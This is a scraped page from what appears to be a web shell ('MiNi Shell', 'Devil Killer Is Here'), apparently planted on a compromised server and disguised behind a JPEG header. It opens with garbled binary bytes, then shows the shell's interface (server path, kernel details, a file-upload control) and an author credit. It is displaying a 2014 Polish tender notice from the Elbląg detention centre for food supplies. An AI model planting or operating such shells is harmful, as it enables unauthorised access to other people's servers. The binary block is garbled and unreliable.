JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140407/74719-N-2014.html

<p class="kh_header"><b>Elbląg: DOSTAWA RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 74719 - 2014; data zamieszczenia: 07.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. 12 Lutego 4a, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 611-21-09, faks 55 611 21 79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I część - TŁUSZCZE I OLEJ:
1.	Tłuszcz roślinny do smarowania pieczywa o zawartości tłuszczu 18% - 30% w opakowaniach jednostkowych do 500 g, szacunkowa roczna ilość - 3500 kg, PN-92/A-86907, kod CPV - 15430000-1
2.	Tłuszcz roślinny do smarowania pieczywa o zawartości tłuszczu minimum 50% w opakowaniach jednostkowych do 250 g, szacunkowa roczna ilość - 2000 kg, PN-A-86907, kod CPV - 15430000-1
3.	Olej roślinny jadalny w opakowaniach jednostkowych do 1 l, szacunkowa roczna ilość - 900 l,  PN-A-86908:2000, kod CPV - 15411100-3

II część - RÓŻNE ARTYKUŁY SPOŻYWCZE:
1.	Proszek jajeczny, szacunkowa roczna ilość - 40 kg, PN-89/A-86502, kod CPV - 15890000-3
2.	Majonez w opakowaniach jednostkowych do 2 kg, szacunkowa roczna ilość - 120 kg, PN - A - 86950, kod CPV -15871273-8
3.	Chrzan tarty w opakowaniach jednostkowych do 2 kg, szacunkowa roczna ilość - 150 kg, PN/R-75520, kod CPV -15331000-7
4.	Groszek konserwowy w opakowaniach jednostkowych do 1 kg, szacunkowa roczna ilość - 120 kg, PN-76/A-77803, kod CPV -15331000-7
5.	Jabłka prażone w opakowaniach jednostkowych do 15 kg, szacunkowa roczna ilość - 300 kg, PN-A-77608:1997, kod CPV -15332140-7
6.	Koncentrat pomidorowy 30%, szacunkowa roczna ilość - 1000 kg, PN-75/A-77601, kod CPV -15331134-5
7.	Kukurydza konserwowa w opakowaniach jednostkowych do 1 kg, szacunkowa roczna ilość - 80 kg, PN-R-75377:1996, kod CPV -15331000-7
8.	Ogórek konserwowy w opakowaniach jednostkowych do 3 kg, szacunkowa roczna ilość - 50 kg, PN-A-77801:1997, kod CPV -15331000-7
9.	Papryka konserwowa w opakowaniach jednostkowych do 3 kg, szacunkowa roczna ilość - 60 kg, PN-V-74016:2001, kod CPV -15331000-7
10.	Bułka tarta, szacunkowa roczna ilość - 180 kg, PN - A - 74113, kod CPV -15811500-1
11.	Kasza jęczmienna, szacunkowa roczna ilość - 1700 kg, PN-87/A-74203, kod CPV -15613000-8
12.	Kasza manna, szacunkowa roczna ilość - 400 kg, PN-88/A-74036, kod CPV -15613300-1
13.	Makaron nitki, krajanka, szacunkowa roczna ilość - 400 kg, PN - A - 74131, kod CPV -15613300-1
14.	Makaron świderki, szacunkowa roczna ilość - 1300 kg, PN - A - 74131, kod CPV -15613300-1
15.	Mąka pszenna typ 500, 550, szacunkowa roczna ilość - 1200 kg, PN-91/A-74022, kod CPV -15612100-2
16.	Mąka ziemniaczana w opakowaniach jednostkowych do 1 kg, szacunkowa roczna ilość - 50 kg, PN-93/A-74710, kod CPV -15312000-8
17.	Płatki owsiane górskie, szacunkowa roczna ilość - 250 kg, PN-82/A-74037, kod CPV - 15613380-5
18.	Ryż łuskany biały, szacunkowa roczna ilość - 1800 kg, PN-A-74220:1997, kod CPV - 15611000-4
19.	Cukier, szacunkowa roczna ilość - 2000 kg, PN - A - 82201, kod CPV - 15831200-4
20.	Cukier waniliowy, szacunkowa roczna ilość - 10 kg, PN - A - 74850, kod CPV - 15833000-6
21.	Dżem w opakowaniach jednostkowych 25 g, szacunkowa roczna ilość - 35 kg, PN - A - 86946, kod CPV - 15332290-3
22.	Dżem niskosłodzony w opakowaniach jednostkowych do 0,5 kg, szacunkowa roczna ilość - 40 kg, PN-A-75100:1994, kod CPV - 15332290-3
23.	Marmolada w opakowaniach jednostkowych do 15 kg, szacunkowa roczna ilość - 1300 kg, PN-93/A-75103, kod CPV - 15332230-5
24.	Miód sztuczny w opakowaniach jednostkowych do 15 kg, szacunkowa roczna ilość - 700 kg, PN - 88/A - 77626, kod CPV - 15831600-8
25.	Powidła śliwkowe w opakowaniach jednostkowych do 15 kg, szacunkowa roczna ilość - 600 kg, PN-A-75100:1994, kod CPV - 15332290-3
26.	Herbata czarna granulowana, szacunkowa roczna ilość - 400 kg, PN - ISO - 3720, kod CPV - 15863200-7
27.	Kisiel, szacunkowa roczna ilość - 80 kg, PN - A - 94051, kod CPV - 15833100-7
28.	Zupa w proszku Barszcz biały, szacunkowa roczna ilość - 180 kg, PN - A - 94050, kod CPV - 15891400-4
29.	Zupa w proszku Rosół drobiowy, szacunkowa roczna ilość - 100 kg, PN - A - 94050, kod CPV - 15891400-4
30.	Koncentrat w proszku Sos biały, szacunkowa roczna ilość - 70 kg, PN - A - 94050, kod CPV - 15871200-6
31.	Zupa w proszku Grzybowa, szacunkowa roczna ilość - 50 kg, PN - A - 94050, kod CPV - 15891400-4
32.	Zupa w proszku Żurek, szacunkowa roczna ilość - 120 kg, PN - A - 94050, kod CPV - 15891400-4
33.	Koncentrat w proszku Bulion grzybowy, szacunkowa roczna ilość - 100 kg, PN - A - 94050, kod CPV - 15891500-5
34.	Koncentrat w proszku Bulion jarzynowy, szacunkowa roczna ilość - 120 kg, PN - A - 94050, kod CPV - 15891500-5
35.	Koncentrat w proszku Bulion wołowy, szacunkowa roczna ilość - 70 kg, PN - A - 94050, kod CPV - 15891500-5
36.	Kwasek cytrynowy, szacunkowa roczna ilość - 25 kg, PN - 81/A - 79734, kod CPV - 15890000-3
37.	Majeranek, szacunkowa roczna ilość - 20 kg, PN-A-86958:1997P, kod CPV - 15872000-1
38.	Musztarda w opakowaniach jednostkowych do 5 kg, szacunkowa roczna ilość - 700 kg, PN - A - 86964, kod CPV - 15871250-1
39.	Ocet w opakowaniach jednostkowych do 1 l, szacunkowa roczna ilość - 250 l, PN - A - 79733, kod CPV - 15871110-8
40.	Pieprz czarny mielony, szacunkowa roczna ilość - 30 kg, PN-A-86965:1997P, kod CPV - 15872100-2
41.	Curry, szacunkowa roczna ilość - 5 kg, PN - 84/R - 87010, kod CPV - 15872000-1
42.	Cynamon, szacunkowa roczna ilość - 5 kg, PN - 84/R - 87010, kod CPV - 15872000-1
43.	Czosnek granulowany, szacunkowa roczna ilość - 20 kg, PN - R - 75518, kod CPV - 15872000-1
44.	Gałka muszkatołowa mielona, szacunkowa roczna ilość - 2 kg, PN - A - 86946, kod CPV - 15872200-3
45.	Imbir mielony, szacunkowa roczna ilość - 2 kg, PN - A - 86946, kod CPV - 15872500-6
46.	Kurkuma, szacunkowa roczna ilość - 3 kg, PN - A - 86955, kod CPV - 15872000-1
47.	Liść laurowy, szacunkowa roczna ilość - 8 kg, PN - 82/R - 78011, kod CPV - 15872000-1
48.	Papryka ostra mielona, szacunkowa roczna ilość - 15 kg, PN - A - 86955, kod CPV - 15872000-1
49.	Papryka słodka mielona, szacunkowa roczna ilość - 15 kg, PN - A - 86955, kod CPV - 15872000-1
50.	Ziele angielskie, szacunkowa roczna ilość - 8 kg, PN - 85/R - 87018, kod CPV - 15872000-1
51.	Przyprawa w proszku uniwersalna typu Jarzynka, szacunkowa roczna ilość - 350 kg, PN - A - 79008, kod CPV - 15871270-7
52.	Przyprawa do zup w płynie w opakowaniach jednostkowych do 1 l, szacunkowa roczna ilość - 400 l, PN - A - 94052, kod CPV - 15871270-7
53.	Sól jodowana, szacunkowa roczna ilość - 1000 kg, PN - C - 84081, kod CPV - 15872400-5
54.	Koper suszony, szacunkowa roczna ilość - 13 kg, PN - 72/A - 77603, kod CPV - 15331000-7
55.	Pietruszka nać suszona, szacunkowa roczna ilość - 15 kg, PN - 72/A - 77603, kod CPV - 15331000-7
56.	Zioła prowansalskie, szacunkowa roczna ilość - 15 kg, PN - A - 86967/5, kod CPV - 15872000-1
57.	Oregano, szacunkowa roczna ilość - 5 kg, PN - A - 86967/5, kod CPV - 15872000-1
58.	Tymianek, szacunkowa roczna ilość - 5 kg, PN - A - 86967/5, kod CPV - 15872000-1
59.	Bazylia, szacunkowa roczna ilość - 5 kg, PN-A-86959:1997P, kod CPV - 15872000-1
60.	Kminek mielony, szacunkowa roczna ilość - 2 kg, PN-A-86953:1997P, kod CPV - 15872000-1
61.	Kostka sojowa, szacunkowa roczna ilość - 150 kg, PN - ISO 5506:2002, kod CPV - 15330000-0
62.	Kotlety sojowe, szacunkowa roczna ilość - 70 kg, PN - ISO 5506:2002, kod CPV - 15330000-0
63.	Granulat sojowy, szacunkowa roczna ilość - 200 kg, PN - ISO 5506:2002, kod CPV - 15330000-0
64.	Syrop, sok owocowy - koncentrat, szacunkowa roczna ilość - 1200 l, PN - 94/A - 75951, kod CPV - 15321800-2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Elblągu: 82 - 300 Elbląg, ul. 12 Lutego 4a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2014 godzina 11:00, miejsce: Areszt Śledczy w Elblągu: 82 - 300 Elbląg, ul. 12 Lutego 4a - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com